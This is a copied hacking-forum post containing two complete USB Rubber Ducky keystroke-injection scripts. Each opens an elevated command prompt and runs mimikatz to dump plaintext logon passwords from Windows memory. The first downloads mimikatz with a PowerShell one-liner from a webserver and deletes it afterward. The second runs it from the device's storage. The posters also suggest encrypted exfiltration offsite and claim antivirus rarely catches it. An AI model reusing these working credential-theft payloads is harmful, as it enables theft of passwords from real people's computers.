The following payload was written by redmeatuk. The payload's forum is located here: # From this point on is a copy paste of redmeatuk's post in the forum. Hello all, This is a Ducky script I knocked up to use the wonderful mimikatz tool. This tool allows you to dump hashes including the clear text passwords for wdigest from memory. http://blog.gentilki...mikatz/minidump http://www.room362.c...rds-with-a.html Requirements -: - Webserver to host Mimikatz binary for your architecture (I tested this on Windows 7 Home Premium 64-bit) you need the ones in the 'alpha' subfolder of the zip/7z file for your architecture - Local user needs to be an administrator account/privs What does it do ? 1. It spawns a command shell with administrator privileges 2. It downloads mimikatz from a webserver using powershell 3. Using mimikatz to dump wdigest passwords from memory 4. Cleans up by deleting the binaries it downloaded It could be improved by using sneaky data exfil techniques to transfer the data encrypted offsite e.g. socat, ncat SSL, stunnel etc If you have a firmware installed that lets you store files you could copy the output to the SD card. Also mimikatz file could be encoded and run through powershell to generate the executable instead of 'wget'ing' the file. You may need to adjust timings in this script to play nice on your machine(s). Script -: ``` REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs) DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 300 ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile('http:///mimikatz.exe','%TEMP%\mimikatz.exe') DELAY 300 ENTER DELAY 3000 STRING %TEMP%\mimikatz.exe DELAY 300 ENTER DELAY 3000 STRING privilege::debug DELAY 300 ENTER DELAY 1000 STRING sekurlsa::logonPasswords full DELAY 300 ENTER DELAY 1000 STRING exit DELAY 300 ENTER DELAY 100 STRING del %TEMP%\mimikatz.exe DELAY 300 ENTER ``` # Now, a similar payload by shutin using a ducky EXE running script, again copy paste. Woo! Finally posting my own working payload! Thanks to overwraith and readmeatuk for their base code that I just tied together. This basically does exactly what readmeatuk's code does except you won't need an internet connection. Requirements: 1) Twin duck firmware or whatever it's called that lets you have a usb storage as well as firing inject.bin upon insertion. 2) mimikatz.exe (either 32bit or 64 bit depending on target environment) placed at the root of that DUCKY drive (drive name MUST be "DUCKY"). Get it here: and use the exe from the "alpha" subdirectory Notes: I tried to do it with procdump but it takes a LONG time to write out the 36meg output file to the card and the window for procdump basically freezes and you have to forcibly kill it. You could probably write the .dmp file to a local disk and then copy it to the ducky but it's still going to take awhile. I don't think that many AV programs are looking for mimikatz so it's fairly safe,. This script could be optimized a little, it's a bit slow and it leaves two windows open. You want to leave the mimikatz window open though because after this f$#%^$ker executes you'll be staring at plaintext passwords for the logged on users!@!$#@ ``` REM Author: shutin who just tied two other authors together: REM overwraith for the exe running stuff and redmeatuk who brought mimikatz to the party REM Name: Runmimikatz.txt DEFAULT_DELAY 75 DELAY 3000 REM get a cmd prompt this way because it's admin and we need that for mimikatz CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 REM the admin part booyah CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 300 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat contents STRING :while1 ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d ENTER STRING if Exist %myd% ( ENTER STRING goto break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto while1 ENTER STRING :break ENTER REM REM FINALLY ACTUALLY RUN AN EXE STRING START %myd%\mimikatz.exe ENTER CONTROL z ENTER STRING DuckyWait.bat ENTER DELAY 1000 ENTER DELAY 3000 STRING privilege::debug DELAY 300 ENTER DELAY 1000 STRING sekurlsa::logonPasswords full DELAY 300 ENTER ```